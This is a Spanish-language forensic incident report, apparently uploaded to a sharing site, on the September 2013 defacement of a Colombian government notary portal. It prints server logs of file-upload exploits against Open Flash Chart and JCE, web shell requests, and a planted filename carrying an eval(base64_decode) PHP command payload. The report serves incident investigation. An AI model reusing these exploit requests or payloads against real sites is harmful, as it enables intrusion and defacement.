Informe de incidentes 18 09-2013
25
Bogotá, Colombia Ver 4.0 04-08 GARS INFORME DE INCIDENTE Incidente No IM626153 Avance de Informe No FINAL Zona de Evento BOGOTA Fecha y Hora de Evento 18-09-2013 Evento Reportado por ETB Fecha y Hora de Solución 19-09-2013 Tipo de Evento Reporte Análisis Forense Descripción de Evento El día 18 de Septiembre de 2013 hacia las 09:50 AM, se reporta que el portal Web ha sido modificado, sin que se hayan realizado maniobras sobre el mismo: www.supernotariado.gov.co A continuación se muestra la imagen de la evidencia en la que se observa que al abrir la página del cliente aparece un aviso de que el sitio fue atacado: Servicios Afectados Superintendencia de Notariado y Registro
-
Upload
johana201225 -
Category
Documents
-
view
1.155 -
download
2
Transcript of Informe de incidentes 18 09-2013
Bogotá, Colombia Ver 4.0 04-08GARS
INFORME DE INCIDENTE
Incidente No IM626153 Avance de Informe No FINAL
Zona de Evento BOGOTA Fecha y Hora de Evento 18-09-2013
Evento Reportado por ETB Fecha y Hora de Solución 19-09-2013
Tipo de Evento
Reporte Análisis Forense
Descripción de Evento
El día 18 de Septiembre de 2013 hacia las 09:50 AM, se reporta que el portal Web ha sido modificado, sin que se hayan realizado maniobras sobre el mismo:www.supernotariado.gov.coA continuación se muestra la imagen de la evidencia en la que se observa que al abrir la página del cliente aparece un aviso de que el sitio fue atacado:
Servicios Afectados
Superintendencia de Notariado y Registro
Avances
Día
Hora
Descripción del Avance
Bogotá, Colombia Ver 4.0 04-08GARS
1. Levantamiento de la evidencia.Se inicia el levantamiento de la evidencia con la extracción de los siguientes datos:
- Log de acceso de los sitios atacados.- Logs de errores de los sitios atacados.- Información y copia de los archivos subidos al portal.- Información y copia de los archivos modificados en el portal.
2. Análisis del caso
Se realiza la respectiva verificación de los logs de acceso para el día 18 de Septiembre, encontrando la siguiente evidencia:
[seguridad@snrportal2 apacheSSL]$ grep POST saccess_log | grep --v ChartSBNR | grep -v 404
103.6.96.26 - - [18/Sep/2013:00:01:11 -0500] "POST /portalsnr/index.php%3foption=com_jnews%26act=mailing%26task=view%26listid=18%26mailingid=8%26listype=1%26Itemid=999/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 400 226
103.6.96.26 - - [18/Sep/2013:00:01:14 -0500] "POST /portalsnr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 303 -
103.6.96.26 - - [18/Sep/2013:00:01:14 -0500] "POST /portalsnr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 303 -
188.40.17.97 - - [18/Sep/2013:02:44:17 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=indo.php HTTP/1.1" 200 51
188.40.17.97 - - [18/Sep/2013:02:44:18 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=botol.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:02:44:18 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=botol.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:02:44:18 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:02:44:19 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52
110.45.146.219 - - [18/Sep/2013:02:44:35 -0500] "POST http://210.166.214.92:6667/ HTTP/1.0" 200 88
188.40.17.97 - - [18/Sep/2013:02:55:44 -0500] "POST
Bogotá, Colombia Ver 4.0 04-08GARS
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=indo.php HTTP/1.1" 200 51
188.40.17.97 - - [18/Sep/2013:02:55:44 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=botol.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:02:58:45 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:02:58:45 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52
90.188.238.17 - - [18/Sep/2013:03:21:56 -0500] "POST /portalsnr/index.php?option=com_jnews&act=mailing&task=view&listid=18&mailingid=8&listype=1&Itemid=999/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 303 -
90.188.238.17 - - [18/Sep/2013:03:21:57 -0500] "POST /portalsnr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 303 -
90.188.238.17 - - [18/Sep/2013:03:21:56 -0500] "POST /portalsnr/index.php?option=com_jnews&act=mailing&task=view&listid=18&mailingid=8&listype=1&Itemid=999/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 303 -
90.188.238.17 - - [18/Sep/2013:03:21:56 -0500] "POST /portalsnr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 303 -
77.245.151.239 - - [18/Sep/2013:06:20:08 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=indo.php HTTP/1.1" 200 51
77.245.151.239 - - [18/Sep/2013:06:20:09 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=botol.php HTTP/1.1" 200 52
77.245.151.239 - - [18/Sep/2013:06:20:09 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52
77.245.151.239 - - [18/Sep/2013:06:28:15 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=indo.php HTTP/1.1" 200 51
Bogotá, Colombia Ver 4.0 04-08GARS
77.245.151.239 - - [18/Sep/2013:06:28:16 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=botol.php HTTP/1.1" 200 52
77.245.151.239 - - [18/Sep/2013:06:28:16 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52
31.172.251.234 - - [18/Sep/2013:08:15:31 -0500] "POST /portalsnr//components//contact.php HTTP/1.1" 200 114934
81.130.21.114 - - [18/Sep/2013:08:32:26 -0500] "POST /portalsnr//components//contact.php HTTP/1.1" 200 86351
81.130.21.114 - - [18/Sep/2013:08:36:57 -0500] "POST /portalsnr//components//contact.php HTTP/1.1" 200 85764
81.130.21.114 - - [18/Sep/2013:08:39:42 -0500] "POST /portalsnr//components//contact.php HTTP/1.1" 200 60158
188.40.17.97 - - [18/Sep/2013:08:47:31 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=indo.php HTTP/1.1" 200 51
188.40.17.97 - - [18/Sep/2013:08:47:31 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=botol.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:08:47:31 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=botol.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:08:47:32 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:08:47:35 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52
110.45.146.219 - - [18/Sep/2013:08:48:15 -0500] "POST http://210.166.214.92:6667/ HTTP/1.0" 200 88
134.3.82.219 - - [18/Sep/2013:08:56:41 -0500] "POST /supernotariado/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 303 -
134.3.82.219 - - [18/Sep/2013:08:56:41 -0500] "POST /supernotariado/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 303 -
134.3.82.219 - - [18/Sep/2013:08:56:42 -0500] "POST /supernotariado/index.php?
Bogotá, Colombia Ver 4.0 04-08GARS
option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 303 -
134.3.82.219 - - [18/Sep/2013:08:56:46 -0500] "POST /supernotariado/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 303 -
91.221.0.124 - - [18/Sep/2013:09:12:44 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=default.php HTTP/1.1" 200 54
118.97.212.185 - - [18/Sep/2013:09:26:38 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/default.php HTTP/1.1" 200 475
118.97.212.185 - - [18/Sep/2013:09:30:09 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/store.php?act=ls&d=%2Fhtdocs%2Fportalsnr%2F&sort=0a HTTP/1.1" 200 6737
77.245.151.239 - - [18/Sep/2013:10:05:00 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=indo.php HTTP/1.1" 200 51
77.245.151.239 - - [18/Sep/2013:10:05:05 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=botol.php HTTP/1.1" 200 52
77.245.151.239 - - [18/Sep/2013:10:05:19 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52
77.245.151.239 - - [18/Sep/2013:10:47:03 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=indo.php HTTP/1.1" 200 51
77.245.151.239 - - [18/Sep/2013:10:47:04 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=botol.php HTTP/1.1" 200 52
77.245.151.239 - - [18/Sep/2013:10:47:05 -0500] "POST /portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=bokek.php HTTP/1.1" 200 52
En donde se observa que se realizaron peticiones POST al servidor, que hacen referencia a un archivo llamado con extensión .php.
Al realizar la resolución de la URL: https://surpenotariado.gov.co/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/default.php
Bogotá, Colombia Ver 4.0 04-08GARS
En donde se puede observar la interfaz de un Web Shell.
Se realiza prueba subiendo un archivo de texto llamado Prueba.txt. Se realiza la resolución de la URL: supernotariado.gov.co/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=prueba.txt
En donde se observa un mensaje dando aviso que el archivo se está siendo guardando en la ruta …/tmp-upload-images/prueba.txt, con lo cual se concluye que el atacante aprovecho una de las vulnerabilidades de un complemento llamado ofc_upload_image.php del Open Flash Chart para crear el archivo default.php y acceder al sitio para instalar los archivos maliciosos. Estos archivos creados a través de este complemento quedan guardados en la ruta /htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/*
A continuación se realiza la revisión de los accesos a la ruta: /htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/* encontrando la
Bogotá, Colombia Ver 4.0 04-08GARS
siguiente evidencia:
stat /htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/* File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/abc.php' Size: 431 Blocks: 8 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281260 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:29.000000000 -0500Modify: 2013-08-06 13:54:26.000000000 -0500Change: 2013-08-06 13:54:26.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/admin.php' Size: 61830 Blocks: 136 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281585 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-12 11:10:36.000000000 -0500Change: 2013-09-12 11:10:36.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/aka.php' Size: 240709 Blocks: 480 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281391 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-03 04:31:32.000000000 -0500Change: 2013-09-03 04:31:32.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/a.php' Size: 2070 Blocks: 8 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281381 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-13 10:52:53.000000000 -0500Change: 2013-09-13 10:52:53.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/bokek.php' Size: 17044 Blocks: 40 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281551 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-18 10:47:05.000000000 -0500Change: 2013-09-18 10:47:05.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/botis.php' Size: 0 Blocks: 0 IO Block: 4096 regular empty fileDevice: fd08h/64776dInode: 24281605 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-17 15:51:37.000000000 -0500Change: 2013-09-17 15:51:37.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/botol.php' Size: 776 Blocks: 8 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281606 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-18 10:47:04.000000000 -0500Change: 2013-09-18 10:47:04.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/bot.php' Size: 770 Blocks: 8 IO Block: 4096 regular file
Bogotá, Colombia Ver 4.0 04-08GARS
Device: fd08h/64776dInode: 24281604 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:29.000000000 -0500Modify: 2013-09-17 15:46:37.000000000 -0500Change: 2013-09-17 15:46:37.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/cal.php' Size: 478 Blocks: 8 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281382 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-16 06:42:55.000000000 -0500Change: 2013-09-16 06:42:55.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/cams.php' Size: 0 Blocks: 0 IO Block: 4096 regular empty fileDevice: fd08h/64776dInode: 24281598 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-17 00:00:32.000000000 -0500Change: 2013-09-17 00:00:32.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/default.php' Size: 613 Blocks: 8 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281392 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:17:10.000000000 -0500Modify: 2013-09-18 09:12:44.000000000 -0500Change: 2013-09-18 09:12:44.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/edit.php' Size: 61634 Blocks: 136 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281363 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-08-16 18:56:21.000000000 -0500Change: 2013-08-16 18:56:21.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/();eval(base64_decode(JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZWNobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK));error' Size: 0 Blocks: 0 IO Block: 4096 regular empty fileDevice: fd08h/64776dInode: 24281343 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-08-21 08:28:51.000000000 -0500Change: 2013-08-21 08:28:51.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/home.php' Size: 73380 Blocks: 152 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281597 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-13 23:54:30.000000000 -0500Change: 2013-09-13 23:54:30.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/hun2.php' Size: 68437 Blocks: 144 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281271 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500
Bogotá, Colombia Ver 4.0 04-08GARS
Modify: 2013-08-15 03:41:41.000000000 -0500Change: 2013-08-15 03:41:41.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/inbox.php' Size: 12062 Blocks: 24 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281559 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-03 23:31:20.000000000 -0500Change: 2013-09-03 23:31:20.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/indo.php' Size: 1524 Blocks: 8 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281599 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-18 10:47:03.000000000 -0500Change: 2013-09-18 10:47:03.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/ipays.php' Size: 240131 Blocks: 480 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281600 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-15 14:23:54.000000000 -0500Change: 2013-09-15 14:23:54.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/ip.txt' Size: 66 Blocks: 8 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281577 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-06 23:00:52.000000000 -0500Change: 2013-09-06 23:00:52.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/kliverz.php' Size: 3957 Blocks: 8 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281570 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:29.000000000 -0500Modify: 2013-09-17 18:12:34.000000000 -0500Change: 2013-09-17 18:12:34.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/load.php' Size: 2442 Blocks: 8 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281576 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-06 22:59:10.000000000 -0500Change: 2013-09-06 22:59:10.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/localhost.php' Size: 3973 Blocks: 8 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281580 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:29.000000000 -0500Modify: 2013-09-12 10:53:42.000000000 -0500Change: 2013-09-12 10:53:42.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/menu.php' Size: 73195 Blocks: 152 IO Block: 4096 regular file
Bogotá, Colombia Ver 4.0 04-08GARS
Device: fd08h/64776dInode: 24281550 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-18 09:26:40.000000000 -0500Change: 2013-09-18 09:26:40.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/own.php' Size: 62587 Blocks: 136 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281560 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-04 00:22:10.000000000 -0500Change: 2013-09-04 00:22:10.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/pass.php' Size: 41080 Blocks: 88 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281601 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-16 14:31:33.000000000 -0500Change: 2013-09-16 14:31:33.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/php.ini' Size: 373 Blocks: 8 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281325 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-08-13 15:47:48.000000000 -0500Change: 2013-08-13 15:48:08.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/pload.php' Size: 474 Blocks: 8 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281305 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-15 14:09:22.000000000 -0500Change: 2013-09-15 14:09:22.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/proc.php' Size: 134566 Blocks: 272 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281578 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-06 23:00:52.000000000 -0500Change: 2013-09-06 23:00:52.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/prueba.txt' Size: 0 Blocks: 0 IO Block: 4096 regular empty fileDevice: fd08h/64776dInode: 24281553 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:25:08.000000000 -0500Modify: 2013-09-18 11:25:08.000000000 -0500Change: 2013-09-18 11:25:08.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/Prueba.txt' Size: 19 Blocks: 8 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281552 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-18 10:51:13.000000000 -0500Change: 2013-09-18 10:51:13.000000000 -0500
Bogotá, Colombia Ver 4.0 04-08GARS
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/readme.php' Size: 73766 Blocks: 160 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281331 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-08-27 23:53:37.000000000 -0500Change: 2013-08-27 23:53:37.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/shell.php' Size: 1524 Blocks: 8 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281602 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-17 15:43:36.000000000 -0500Change: 2013-09-17 15:43:36.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/store.php' Size: 73780 Blocks: 160 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281281 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-07 09:04:09.000000000 -0500Change: 2013-09-07 09:04:09.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/tux.php' Size: 58128 Blocks: 128 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281320 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-08-13 15:43:39.000000000 -0500Change: 2013-08-13 15:43:39.000000000 -0500 File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/wp-app.php' Size: 101722 Blocks: 208 IO Block: 4096 regular fileDevice: fd08h/64776dInode: 24281590 Links: 1Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)Access: 2013-09-18 11:15:30.000000000 -0500Modify: 2013-09-13 10:53:09.000000000 -0500Change: 2013-09-13 10:53:09.000000000 -0500
En donde se observa que en esta carpeta se están guardando los archivos que a través del webshell y de la vulnerabilidad del Open Flash Chart se están subiendo al sitio. Como se evidencia, los archivos default.php y prueba.txt se encuentran en esta carpeta.
De igual manera se realizó la búsqueda de los últimos archivos modificados en el sitio del cliente encontrando las siguientes referencias:
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/kliverz.php/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/bot.php/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/indo.php/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/shell.php/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/menu.php/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/bokek.php/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/botis.php/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/botol.php/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/default.php
Bogotá, Colombia Ver 4.0 04-08GARS
3. Resultados y conclusiones
